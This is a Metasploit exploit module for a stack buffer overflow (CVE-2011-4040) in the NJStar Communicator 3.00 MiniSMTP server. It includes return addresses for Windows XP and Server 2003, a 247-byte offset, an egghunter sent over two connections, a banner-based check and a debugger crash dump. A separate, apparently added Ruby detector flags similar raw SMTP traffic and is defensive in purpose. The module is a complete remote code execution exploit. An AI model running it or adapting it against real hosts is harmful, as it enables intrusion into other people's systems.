GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/smtp/njstar_smtp_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Egghunter

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'NJStar Communicator 3.00 MiniSMTP Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow vulnerability in NJStar Communicator
          Version 3.00 MiniSMTP server. The MiniSMTP application can be seen in multiple
          NJStar products, and will continue to run in the background even if the
          software is already shut down. According to the vendor's testimonials,
          NJStar software is also used by well-known companies such as Siemens, NEC,
          Google, Yahoo, eBay; government agencies such as the FBI, Department of
          Justice (HK); as well as a long list of universities such as Yale, Harvard,
          University of Tokyo, etc.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Dillon Beresford', # Original discovery and MSF Module.
        ],
        'References' => [
          [ 'OSVDB', '76728' ],
          [ 'CVE', '2011-4040' ],
          [ 'URL', 'http://www.njstar.com/cms/njstar-communicator' ],
          [ 'EDB', '18057' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Platform' => 'win',
        'Payload' => {
          'BadChars' => "\x00",
          'StackAdjustment' => -1500,
        },
        'Targets' => [
          [
            'Windows XP SP2/SP3',
            {
              'Ret' => 0x77c35459, # PUSH ESP; RETN (MSVCRT.dll)
              'Offset' => 247,
            }
          ],
          [
            # Can't test patch level on this one, because you can't
            # even update Win2k3 SP0 anymore from Windows Update
            'Windows Server 2003 SP0',
            {
              'Ret' => 0x77d20738, # JMP ESP (USER32.dll)
              'Offset' => 247,
            }
          ],
          [
            'Windows Server 2003 SP1/SP2',
            {
              'Ret' => 0x77BE2265, # PUSH ESP; RETN (MSVCRT.dll)
              'Offset' => 247,
            }
          ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2011-10-31',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([Opt::RPORT(25)])
  end

  def check
    connect
    # We get a response like: "220 [host-name] Service Ready"
    # But we don't really care about this one
    res = sock.get_once(-1, 5)
    vprint_status("Banner: #{res.to_s.chop}")

    sock.puts("HELP\r\n")

    # But the HELP response will tell us if this is a NJStar SMTP or not
    res = sock.get_once(-1, 5)
    vprint_status("HELP Response: #{res.to_s.chop}")
    disconnect

    # I can only flag it as "Detected" because it doesn't return a version
    if res =~ /Windows E-mail Server From NJStar Software/i
      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    eggoptions =
      {
        :checksum => true,
        :eggtag => "w00t"
      }

    hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)

    buffer = rand_text(target['Offset'])
    buffer << [target.ret].pack('V')
    buffer << hunter
    buffer << make_nops(4)

    # Just some debugging output so we can see the length and bytes of each of our buffers.
    vprint_status("egg: %u bytes: \n" % egg.length + Rex::Text.to_hex_dump(egg))
    vprint_status("hunter: %u bytes: \n" % hunter.length + Rex::Text.to_hex_dump(hunter))
    vprint_status("buffer: %u bytes:\n" % buffer.length + Rex::Text.to_hex_dump(buffer))

    print_status("Trying target #{target.name}...")

    # har har har you get trick no treat...
    # we don't have very much space so we
    # send our egg in a separate connection
    connect

    print_status("Sending the egg...")
    sock.put(egg)

    # I think you betta call, ghostbusters...
    # now we send our evil buffer along with the
    # egg hunter, we are doing multiple connections
    # to solve the issue with limited stack space.
    # thanks to bannedit for advice on threads and
    # making multiple connections to get around
    # stack space constraints. :)
    connect

    print_status("Sending our buffer containing the egg hunter...")
    sock.put(buffer)

    handler
    disconnect
  end
end

=begin
Dillon Beresford
https://twitter.com/#!/D1N

NJStar Communicator
Version: 3.00 and prior
Build: 11818 and prior

Tested minismtp version:
1.30.0.60218

Shouts to bannedit, sinn3r, rick2600, tmanning, corelanc0d3r, jcran,
manils, d0tslash, mublix, halsten, and everyone at AHA!

No response as of 10/31/11 from AUSCERT or the software vendor. CNCERT and USCERT responded
on 10/30/11 and 10/31/11, CNCERT said in an email they needed to see if the vulnerability
is remotely exploitable and needed more verification. I sent a proof of concept exploit
in python with remote code execution. So, here is the proof that the bug is, in fact,
remotely exploitable. WIN!

System DLLs are used for target.ret because minismtp.exe is the only NJStar component in
memory, and its base starts with a 0x00, that's no good. However, if your target machine
started minismtp from the Windows start menu (Start -> All Programs -> NJStar Communicator
-> NJStar MiniSmtp), it'd actually load up more DLLs. And one of them -- MSVCR100.dll -- is
ideal enough to use (No rebase, starts with a high address, but there is an ASLR flag).

eax=00000000 ebx=00417bf8 ecx=00002745 edx=00000000 esi=008a3e50
edi=008a3d80
eip=42424242 esp=00ccff70 ebp=7c8097d0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010206
42424242 ?? ???
0:003> !exchain
image00400000+bbc4 (0040bbc4)
00ccff00: 41414141
Invalid exception stack at 41414141
0:003> d esp
00ccff70 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
00ccff80 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
00ccff90 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
00ccffa0 44 44 44 44 00 ff cc 00-c4 bb 40 00 20 23 41 00 DDDD......@. #A.
00ccffb0 00 00 00 00 ec ff cc 00-29 b7 80 7c b8 3d 8a 00 ........)..|.=..
00ccffc0 00 00 00 00 00 00 00 00-b8 3d 8a 00 00 c0 fd 7f .........=......
00ccffd0 00 d6 e3 89 c0 ff cc 00-98 08 99 89 ff ff ff ff ................
00ccffe0 d8 9a 83 7c 30 b7 80 7c-00 00 00 00 00 00 00 00 ...|0..|........

=end
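The module above sends its egg and its 247-byte-offset buffer as raw data on fresh port-25 connections, without any SMTP verb, and its check method keys on the "Windows E-mail Server From NJStar Software" HELP banner. The following detector, an added example that is not part of the Metasploit module or the rapid7 project, turns those two traits into session-level alerts for a defender reviewing captured SMTP traffic. It assumes the capture has already been split into ordered client/server payloads; the sample sessions are constructed, not real captures.

```ruby
SMTP_VERBS = %w[HELO EHLO MAIL RCPT DATA RSET NOOP QUIT VRFY EXPN HELP AUTH STARTTLS].freeze
OVERFLOW_OFFSET = 247 # 'Offset' from the module's target table
NJSTAR_BANNER = /Windows E-mail Server From NJStar Software/i # string the check method matches

# True when the payload starts with a known SMTP verb. .b forces ASCII-8BIT so
# regex matching never raises on raw, non-UTF-8 bytes.
def smtp_command?(payload)
  verb = payload.b[/\A([A-Za-z]+)/, 1]
  !verb.nil? && SMTP_VERBS.include?(verb.upcase)
end

# True when the payload holds bytes outside printable ASCII plus TAB/LF/CR.
def binary?(payload)
  payload.each_byte.any? { |b| (b < 0x20 && ![0x09, 0x0a, 0x0d].include?(b)) || b > 0x7e }
end

# events: [{dir: :c2s | :s2c, data: String}, ...] in capture order (one or more connections).
# Returns alert strings; empty when the session looks normal. Message bodies after DATA
# are skipped so long mail lines do not false-positive on the length check.
def analyze_session(events)
  alerts = []
  in_data = false
  njstar = events.any? { |e| e[:dir] == :s2c && e[:data].b =~ NJSTAR_BANNER }
  events.each_with_index do |e, i|
    next unless e[:dir] == :c2s
    data = e[:data].b
    if in_data
      in_data = false if data.end_with?("\r\n.\r\n") || data == ".\r\n"
      next
    end
    if smtp_command?(data)
      in_data = true if data =~ /\ADATA\r?\n?\z/i
      next
    end
    if data.bytesize > OVERFLOW_OFFSET
      alerts << "payload ##{i}: #{data.bytesize} bytes with no SMTP verb (overflow offset #{OVERFLOW_OFFSET})"
    elsif binary?(data)
      alerts << "payload ##{i}: raw binary with no SMTP verb (#{data.bytesize} bytes)"
    end
  end
  alerts.map! { |a| "[NJStar MiniSMTP banner seen] #{a}" } if njstar
  alerts
end

# Constructed samples: a normal exchange, then two raw connections shaped like the
# module's egg (tag plus binary) and its oversized egg-hunter buffer.
BENIGN = [{ dir: :s2c, data: "220 mail.example.test Service Ready\r\n" }, { dir: :c2s, data: "HELP\r\n" },
          { dir: :s2c, data: "214 Windows E-mail Server From NJStar Software\r\n" }, { dir: :c2s, data: "DATA\r\n" },
          { dir: :s2c, data: "354 go ahead\r\n" }, { dir: :c2s, data: ("x" * 400) + "\r\n.\r\n" }, { dir: :c2s, data: "QUIT\r\n" }]
SUSPICIOUS = [{ dir: :s2c, data: "220 host Service Ready\r\n" }, { dir: :c2s, data: "w00tw00t".b + ("\x90".b * 32) },
              { dir: :s2c, data: "220 host Service Ready\r\n" }, { dir: :c2s, data: ("A" * 247).b + "\xde\xad\xbe\xef".b + ("\x90".b * 40) }]
puts analyze_session(SUSPICIOUS)
```

The banner tag only appears when the same capture also holds the server's HELP reply, so a detector run over raw exploit connections alone still fires but without the NJStar attribution.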